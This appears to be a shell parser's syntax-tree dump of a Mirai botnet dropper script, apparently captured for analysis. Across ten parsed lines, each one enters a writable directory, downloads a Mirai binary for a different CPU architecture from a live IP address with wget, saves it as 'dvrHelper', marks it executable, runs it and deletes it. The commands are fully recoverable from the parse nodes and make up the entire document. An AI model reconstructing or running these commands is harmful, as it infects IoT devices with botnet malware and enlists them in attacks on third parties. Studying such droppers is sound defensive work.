ListNode(lineno=2, pos=(13, 170), parts=[
  CommandNode(lineno=2, pos=(13, 20), parts=[
    WordNode(lineno=2, pos=(13, 15), word='cd'),
    WordNode(lineno=2, pos=(16, 20), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(21, 23)),
  CommandNode(lineno=2, pos=(24, 35), parts=[
    WordNode(lineno=2, pos=(24, 26), word='cd'),
    WordNode(lineno=2, pos=(27, 35), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(36, 38)),
  CommandNode(lineno=2, pos=(39, 46), parts=[
    WordNode(lineno=2, pos=(39, 41), word='cd'),
    WordNode(lineno=2, pos=(42, 46), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(47, 49)),
  CommandNode(lineno=2, pos=(50, 58), parts=[
    WordNode(lineno=2, pos=(50, 52), word='cd'),
    WordNode(lineno=2, pos=(53, 58), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(59, 61)),
  CommandNode(lineno=2, pos=(62, 66), parts=[
    WordNode(lineno=2, pos=(62, 64), word='cd'),
    WordNode(lineno=2, pos=(65, 66), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(66, 67)),
  CommandNode(lineno=2, pos=(68, 118), parts=[
    WordNode(lineno=2, pos=(68, 72), word='wget'),
    WordNode(lineno=2, pos=(73, 105), word='http://113.53.235.91/e/mirai.arm'),
    WordNode(lineno=2, pos=(106, 108), word='-O'),
    WordNode(lineno=2, pos=(109, 118), word='dvrHelper'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(118, 119)),
  CommandNode(lineno=2, pos=(120, 138), parts=[
    WordNode(lineno=2, pos=(120, 125), word='chmod'),
    WordNode(lineno=2, pos=(126, 128), word='+x'),
    WordNode(lineno=2, pos=(129, 138), word='dvrHelper'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(138, 139)),
  CommandNode(lineno=2, pos=(140, 151), parts=[
    WordNode(lineno=2, pos=(140, 151), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(151, 152)),
  CommandNode(lineno=2, pos=(153, 170), parts=[
    WordNode(lineno=2, pos=(153, 155), word='rm'),
    WordNode(lineno=2, pos=(156, 159), word='-rf'),
    WordNode(lineno=2, pos=(160, 170), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=3, pos=(171, 329), parts=[
  CommandNode(lineno=3, pos=(171, 178), parts=[
    WordNode(lineno=3, pos=(171, 173), word='cd'),
    WordNode(lineno=3, pos=(174, 178), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(179, 181)),
  CommandNode(lineno=3, pos=(182, 193), parts=[
    WordNode(lineno=3, pos=(182, 184), word='cd'),
    WordNode(lineno=3, pos=(185, 193), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(194, 196)),
  CommandNode(lineno=3, pos=(197, 204), parts=[
    WordNode(lineno=3, pos=(197, 199), word='cd'),
    WordNode(lineno=3, pos=(200, 204), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(205, 207)),
  CommandNode(lineno=3, pos=(208, 216), parts=[
    WordNode(lineno=3, pos=(208, 210), word='cd'),
    WordNode(lineno=3, pos=(211, 216), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(217, 219)),
  CommandNode(lineno=3, pos=(220, 224), parts=[
    WordNode(lineno=3, pos=(220, 222), word='cd'),
    WordNode(lineno=3, pos=(223, 224), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(224, 225)),
  CommandNode(lineno=3, pos=(226, 277), parts=[
    WordNode(lineno=3, pos=(226, 230), word='wget'),
    WordNode(lineno=3, pos=(231, 264), word='http://113.53.235.91/e/mirai.m68k'),
    WordNode(lineno=3, pos=(265, 267), word='-O'),
    WordNode(lineno=3, pos=(268, 277), word='dvrHelper'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(277, 278)),
  CommandNode(lineno=3, pos=(279, 297), parts=[
    WordNode(lineno=3, pos=(279, 284), word='chmod'),
    WordNode(lineno=3, pos=(285, 287), word='+x'),
    WordNode(lineno=3, pos=(288, 297), word='dvrHelper'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(297, 298)),
  CommandNode(lineno=3, pos=(299, 310), parts=[
    WordNode(lineno=3, pos=(299, 310), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(310, 311)),
  CommandNode(lineno=3, pos=(312, 329), parts=[
    WordNode(lineno=3, pos=(312, 314), word='rm'),
    WordNode(lineno=3, pos=(315, 318), word='-rf'),
    WordNode(lineno=3, pos=(319, 329), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=4, pos=(330, 488), parts=[
  CommandNode(lineno=4, pos=(330, 337), parts=[
    WordNode(lineno=4, pos=(330, 332), word='cd'),
    WordNode(lineno=4, pos=(333, 337), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(338, 340)),
  CommandNode(lineno=4, pos=(341, 352), parts=[
    WordNode(lineno=4, pos=(341, 343), word='cd'),
    WordNode(lineno=4, pos=(344, 352), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(353, 355)),
  CommandNode(lineno=4, pos=(356, 363), parts=[
    WordNode(lineno=4, pos=(356, 358), word='cd'),
    WordNode(lineno=4, pos=(359, 363), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(364, 366)),
  CommandNode(lineno=4, pos=(367, 375), parts=[
    WordNode(lineno=4, pos=(367, 369), word='cd'),
    WordNode(lineno=4, pos=(370, 375), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(376, 378)),
  CommandNode(lineno=4, pos=(379, 383), parts=[
    WordNode(lineno=4, pos=(379, 381), word='cd'),
    WordNode(lineno=4, pos=(382, 383), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(383, 384)),
  CommandNode(lineno=4, pos=(385, 436), parts=[
    WordNode(lineno=4, pos=(385, 389), word='wget'),
    WordNode(lineno=4, pos=(390, 423), word='http://113.53.235.91/e/mirai.mips'),
    WordNode(lineno=4, pos=(424, 426), word='-O'),
    WordNode(lineno=4, pos=(427, 436), word='dvrHelper'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(436, 437)),
  CommandNode(lineno=4, pos=(438, 456), parts=[
    WordNode(lineno=4, pos=(438, 443), word='chmod'),
    WordNode(lineno=4, pos=(444, 446), word='+x'),
    WordNode(lineno=4, pos=(447, 456), word='dvrHelper'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(456, 457)),
  CommandNode(lineno=4, pos=(458, 469), parts=[
    WordNode(lineno=4, pos=(458, 469), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(469, 470)),
  CommandNode(lineno=4, pos=(471, 488), parts=[
    WordNode(lineno=4, pos=(471, 473), word='rm'),
    WordNode(lineno=4, pos=(474, 477), word='-rf'),
    WordNode(lineno=4, pos=(478, 488), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=5, pos=(489, 647), parts=[
  CommandNode(lineno=5, pos=(489, 496), parts=[
    WordNode(lineno=5, pos=(489, 491), word='cd'),
    WordNode(lineno=5, pos=(492, 496), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(497, 499)),
  CommandNode(lineno=5, pos=(500, 511), parts=[
    WordNode(lineno=5, pos=(500, 502), word='cd'),
    WordNode(lineno=5, pos=(503, 511), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(512, 514)),
  CommandNode(lineno=5, pos=(515, 522), parts=[
    WordNode(lineno=5, pos=(515, 517), word='cd'),
    WordNode(lineno=5, pos=(518, 522), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(523, 525)),
  CommandNode(lineno=5, pos=(526, 534), parts=[
    WordNode(lineno=5, pos=(526, 528), word='cd'),
    WordNode(lineno=5, pos=(529, 534), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(535, 537)),
  CommandNode(lineno=5, pos=(538, 542), parts=[
    WordNode(lineno=5, pos=(538, 540), word='cd'),
    WordNode(lineno=5, pos=(541, 542), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(542, 543)),
  CommandNode(lineno=5, pos=(544, 595), parts=[
    WordNode(lineno=5, pos=(544, 548), word='wget'),
    WordNode(lineno=5, pos=(549, 582), word='http://113.53.235.91/e/mirai.mpsl'),
    WordNode(lineno=5, pos=(583, 585), word='-O'),
    WordNode(lineno=5, pos=(586, 595), word='dvrHelper'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(595, 596)),
  CommandNode(lineno=5, pos=(597, 615), parts=[
    WordNode(lineno=5, pos=(597, 602), word='chmod'),
    WordNode(lineno=5, pos=(603, 605), word='+x'),
    WordNode(lineno=5, pos=(606, 615), word='dvrHelper'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(615, 616)),
  CommandNode(lineno=5, pos=(617, 628), parts=[
    WordNode(lineno=5, pos=(617, 628), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(628, 629)),
  CommandNode(lineno=5, pos=(630, 647), parts=[
    WordNode(lineno=5, pos=(630, 632), word='rm'),
    WordNode(lineno=5, pos=(633, 636), word='-rf'),
    WordNode(lineno=5, pos=(637, 647), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=6, pos=(648, 805), parts=[
  CommandNode(lineno=6, pos=(648, 655), parts=[
    WordNode(lineno=6, pos=(648, 650), word='cd'),
    WordNode(lineno=6, pos=(651, 655), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(656, 658)),
  CommandNode(lineno=6, pos=(659, 670), parts=[
    WordNode(lineno=6, pos=(659, 661), word='cd'),
    WordNode(lineno=6, pos=(662, 670), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(671, 673)),
  CommandNode(lineno=6, pos=(674, 681), parts=[
    WordNode(lineno=6, pos=(674, 676), word='cd'),
    WordNode(lineno=6, pos=(677, 681), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(682, 684)),
  CommandNode(lineno=6, pos=(685, 693), parts=[
    WordNode(lineno=6, pos=(685, 687), word='cd'),
    WordNode(lineno=6, pos=(688, 693), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(694, 696)),
  CommandNode(lineno=6, pos=(697, 701), parts=[
    WordNode(lineno=6, pos=(697, 699), word='cd'),
    WordNode(lineno=6, pos=(700, 701), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(701, 702)),
  CommandNode(lineno=6, pos=(703, 753), parts=[
    WordNode(lineno=6, pos=(703, 707), word='wget'),
    WordNode(lineno=6, pos=(708, 740), word='http://113.53.235.91/e/mirai.x86'),
    WordNode(lineno=6, pos=(741, 743), word='-O'),
    WordNode(lineno=6, pos=(744, 753), word='dvrHelper'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(753, 754)),
  CommandNode(lineno=6, pos=(755, 773), parts=[
    WordNode(lineno=6, pos=(755, 760), word='chmod'),
    WordNode(lineno=6, pos=(761, 763), word='+x'),
    WordNode(lineno=6, pos=(764, 773), word='dvrHelper'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(773, 774)),
  CommandNode(lineno=6, pos=(775, 786), parts=[
    WordNode(lineno=6, pos=(775, 786), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(786, 787)),
  CommandNode(lineno=6, pos=(788, 805), parts=[
    WordNode(lineno=6, pos=(788, 790), word='rm'),
    WordNode(lineno=6, pos=(791, 794), word='-rf'),
    WordNode(lineno=6, pos=(795, 805), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=7, pos=(806, 963), parts=[
  CommandNode(lineno=7, pos=(806, 813), parts=[
    WordNode(lineno=7, pos=(806, 808), word='cd'),
    WordNode(lineno=7, pos=(809, 813), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(814, 816)),
  CommandNode(lineno=7, pos=(817, 828), parts=[
    WordNode(lineno=7, pos=(817, 819), word='cd'),
    WordNode(lineno=7, pos=(820, 828), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(829, 831)),
  CommandNode(lineno=7, pos=(832, 839), parts=[
    WordNode(lineno=7, pos=(832, 834), word='cd'),
    WordNode(lineno=7, pos=(835, 839), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(840, 842)),
  CommandNode(lineno=7, pos=(843, 851), parts=[
    WordNode(lineno=7, pos=(843, 845), word='cd'),
    WordNode(lineno=7, pos=(846, 851), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(852, 854)),
  CommandNode(lineno=7, pos=(855, 859), parts=[
    WordNode(lineno=7, pos=(855, 857), word='cd'),
    WordNode(lineno=7, pos=(858, 859), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(859, 860)),
  CommandNode(lineno=7, pos=(861, 911), parts=[
    WordNode(lineno=7, pos=(861, 865), word='wget'),
    WordNode(lineno=7, pos=(866, 898), word='http://113.53.235.91/e/mirai.spc'),
    WordNode(lineno=7, pos=(899, 901), word='-O'),
    WordNode(lineno=7, pos=(902, 911), word='dvrHelper'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(911, 912)),
  CommandNode(lineno=7, pos=(913, 931), parts=[
    WordNode(lineno=7, pos=(913, 918), word='chmod'),
    WordNode(lineno=7, pos=(919, 921), word='+x'),
    WordNode(lineno=7, pos=(922, 931), word='dvrHelper'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(931, 932)),
  CommandNode(lineno=7, pos=(933, 944), parts=[
    WordNode(lineno=7, pos=(933, 944), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(944, 945)),
  CommandNode(lineno=7, pos=(946, 963), parts=[
    WordNode(lineno=7, pos=(946, 948), word='rm'),
    WordNode(lineno=7, pos=(949, 952), word='-rf'),
    WordNode(lineno=7, pos=(953, 963), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=8, pos=(964, 1122), parts=[
  CommandNode(lineno=8, pos=(964, 971), parts=[
    WordNode(lineno=8, pos=(964, 966), word='cd'),
    WordNode(lineno=8, pos=(967, 971), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(972, 974)),
  CommandNode(lineno=8, pos=(975, 986), parts=[
    WordNode(lineno=8, pos=(975, 977), word='cd'),
    WordNode(lineno=8, pos=(978, 986), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(987, 989)),
  CommandNode(lineno=8, pos=(990, 997), parts=[
    WordNode(lineno=8, pos=(990, 992), word='cd'),
    WordNode(lineno=8, pos=(993, 997), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(998, 1000)),
  CommandNode(lineno=8, pos=(1001, 1009), parts=[
    WordNode(lineno=8, pos=(1001, 1003), word='cd'),
    WordNode(lineno=8, pos=(1004, 1009), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1010, 1012)),
  CommandNode(lineno=8, pos=(1013, 1017), parts=[
    WordNode(lineno=8, pos=(1013, 1015), word='cd'),
    WordNode(lineno=8, pos=(1016, 1017), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1017, 1018)),
  CommandNode(lineno=8, pos=(1019, 1070), parts=[
    WordNode(lineno=8, pos=(1019, 1023), word='wget'),
    WordNode(lineno=8, pos=(1024, 1057), word='http://113.53.235.91/e/mirai.arm7'),
    WordNode(lineno=8, pos=(1058, 1060), word='-O'),
    WordNode(lineno=8, pos=(1061, 1070), word='dvrHelper'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1070, 1071)),
  CommandNode(lineno=8, pos=(1072, 1090), parts=[
    WordNode(lineno=8, pos=(1072, 1077), word='chmod'),
    WordNode(lineno=8, pos=(1078, 1080), word='+x'),
    WordNode(lineno=8, pos=(1081, 1090), word='dvrHelper'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1090, 1091)),
  CommandNode(lineno=8, pos=(1092, 1103), parts=[
    WordNode(lineno=8, pos=(1092, 1103), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1103, 1104)),
  CommandNode(lineno=8, pos=(1105, 1122), parts=[
    WordNode(lineno=8, pos=(1105, 1107), word='rm'),
    WordNode(lineno=8, pos=(1108, 1111), word='-rf'),
    WordNode(lineno=8, pos=(1112, 1122), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=9, pos=(1123, 1282), parts=[
  CommandNode(lineno=9, pos=(1123, 1130), parts=[
    WordNode(lineno=9, pos=(1123, 1125), word='cd'),
    WordNode(lineno=9, pos=(1126, 1130), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1131, 1133)),
  CommandNode(lineno=9, pos=(1134, 1145), parts=[
    WordNode(lineno=9, pos=(1134, 1136), word='cd'),
    WordNode(lineno=9, pos=(1137, 1145), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1146, 1148)),
  CommandNode(lineno=9, pos=(1149, 1156), parts=[
    WordNode(lineno=9, pos=(1149, 1151), word='cd'),
    WordNode(lineno=9, pos=(1152, 1156), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1157, 1159)),
  CommandNode(lineno=9, pos=(1160, 1168), parts=[
    WordNode(lineno=9, pos=(1160, 1162), word='cd'),
    WordNode(lineno=9, pos=(1163, 1168), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1169, 1171)),
  CommandNode(lineno=9, pos=(1172, 1176), parts=[
    WordNode(lineno=9, pos=(1172, 1174), word='cd'),
    WordNode(lineno=9, pos=(1175, 1176), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1176, 1177)),
  CommandNode(lineno=9, pos=(1178, 1230), parts=[
    WordNode(lineno=9, pos=(1178, 1182), word='wget'),
    WordNode(lineno=9, pos=(1183, 1217), word='http://113.53.235.91/e/mirai.arm5n'),
    WordNode(lineno=9, pos=(1218, 1220), word='-O'),
    WordNode(lineno=9, pos=(1221, 1230), word='dvrHelper'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1230, 1231)),
  CommandNode(lineno=9, pos=(1232, 1250), parts=[
    WordNode(lineno=9, pos=(1232, 1237), word='chmod'),
    WordNode(lineno=9, pos=(1238, 1240), word='+x'),
    WordNode(lineno=9, pos=(1241, 1250), word='dvrHelper'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1250, 1251)),
  CommandNode(lineno=9, pos=(1252, 1263), parts=[
    WordNode(lineno=9, pos=(1252, 1263), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1263, 1264)),
  CommandNode(lineno=9, pos=(1265, 1282), parts=[
    WordNode(lineno=9, pos=(1265, 1267), word='rm'),
    WordNode(lineno=9, pos=(1268, 1271), word='-rf'),
    WordNode(lineno=9, pos=(1272, 1282), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=10, pos=(1283, 1440), parts=[
  CommandNode(lineno=10, pos=(1283, 1290), parts=[
    WordNode(lineno=10, pos=(1283, 1285), word='cd'),
    WordNode(lineno=10, pos=(1286, 1290), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1291, 1293)),
  CommandNode(lineno=10, pos=(1294, 1305), parts=[
    WordNode(lineno=10, pos=(1294, 1296), word='cd'),
    WordNode(lineno=10, pos=(1297, 1305), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1306, 1308)),
  CommandNode(lineno=10, pos=(1309, 1316), parts=[
    WordNode(lineno=10, pos=(1309, 1311), word='cd'),
    WordNode(lineno=10, pos=(1312, 1316), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1317, 1319)),
  CommandNode(lineno=10, pos=(1320, 1328), parts=[
    WordNode(lineno=10, pos=(1320, 1322), word='cd'),
    WordNode(lineno=10, pos=(1323, 1328), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1329, 1331)),
  CommandNode(lineno=10, pos=(1332, 1336), parts=[
    WordNode(lineno=10, pos=(1332, 1334), word='cd'),
    WordNode(lineno=10, pos=(1335, 1336), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1336, 1337)),
  CommandNode(lineno=10, pos=(1338, 1388), parts=[
    WordNode(lineno=10, pos=(1338, 1342), word='wget'),
    WordNode(lineno=10, pos=(1343, 1375), word='http://113.53.235.91/e/mirai.ppc'),
    WordNode(lineno=10, pos=(1376, 1378), word='-O'),
    WordNode(lineno=10, pos=(1379, 1388), word='dvrHelper'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1388, 1389)),
  CommandNode(lineno=10, pos=(1390, 1408), parts=[
    WordNode(lineno=10, pos=(1390, 1395), word='chmod'),
    WordNode(lineno=10, pos=(1396, 1398), word='+x'),
    WordNode(lineno=10, pos=(1399, 1408), word='dvrHelper'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1408, 1409)),
  CommandNode(lineno=10, pos=(1410, 1421), parts=[
    WordNode(lineno=10, pos=(1410, 1421), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1421, 1422)),
  CommandNode(lineno=10, pos=(1423, 1440), parts=[
    WordNode(lineno=10, pos=(1423, 1425), word='rm'),
    WordNode(lineno=10, pos=(1426, 1429), word='-rf'),
    WordNode(lineno=10, pos=(1430, 1440), word='dvrHelper\r'),
  ]),
])
ListNode(lineno=11, pos=(1441, 1598), parts=[
  CommandNode(lineno=11, pos=(1441, 1448), parts=[
    WordNode(lineno=11, pos=(1441, 1443), word='cd'),
    WordNode(lineno=11, pos=(1444, 1448), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1449, 1451)),
  CommandNode(lineno=11, pos=(1452, 1463), parts=[
    WordNode(lineno=11, pos=(1452, 1454), word='cd'),
    WordNode(lineno=11, pos=(1455, 1463), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1464, 1466)),
  CommandNode(lineno=11, pos=(1467, 1474), parts=[
    WordNode(lineno=11, pos=(1467, 1469), word='cd'),
    WordNode(lineno=11, pos=(1470, 1474), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1475, 1477)),
  CommandNode(lineno=11, pos=(1478, 1486), parts=[
    WordNode(lineno=11, pos=(1478, 1480), word='cd'),
    WordNode(lineno=11, pos=(1481, 1486), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1487, 1489)),
  CommandNode(lineno=11, pos=(1490, 1494), parts=[
    WordNode(lineno=11, pos=(1490, 1492), word='cd'),
    WordNode(lineno=11, pos=(1493, 1494), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1494, 1495)),
  CommandNode(lineno=11, pos=(1496, 1546), parts=[
    WordNode(lineno=11, pos=(1496, 1500), word='wget'),
    WordNode(lineno=11, pos=(1501, 1533), word='http://113.53.235.91/e/mirai.sh4'),
    WordNode(lineno=11, pos=(1534, 1536), word='-O'),
    WordNode(lineno=11, pos=(1537, 1546), word='dvrHelper'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1546, 1547)),
  CommandNode(lineno=11, pos=(1548, 1566), parts=[
    WordNode(lineno=11, pos=(1548, 1553), word='chmod'),
    WordNode(lineno=11, pos=(1554, 1556), word='+x'),
    WordNode(lineno=11, pos=(1557, 1566), word='dvrHelper'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1566, 1567)),
  CommandNode(lineno=11, pos=(1568, 1579), parts=[
    WordNode(lineno=11, pos=(1568, 1579), word='./dvrHelper'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1579, 1580)),
  CommandNode(lineno=11, pos=(1581, 1598), parts=[
    WordNode(lineno=11, pos=(1581, 1583), word='rm'),
    WordNode(lineno=11, pos=(1584, 1587), word='-rf'),
    WordNode(lineno=11, pos=(1588, 1598), word='dvrHelper\r'),
  ]),
])
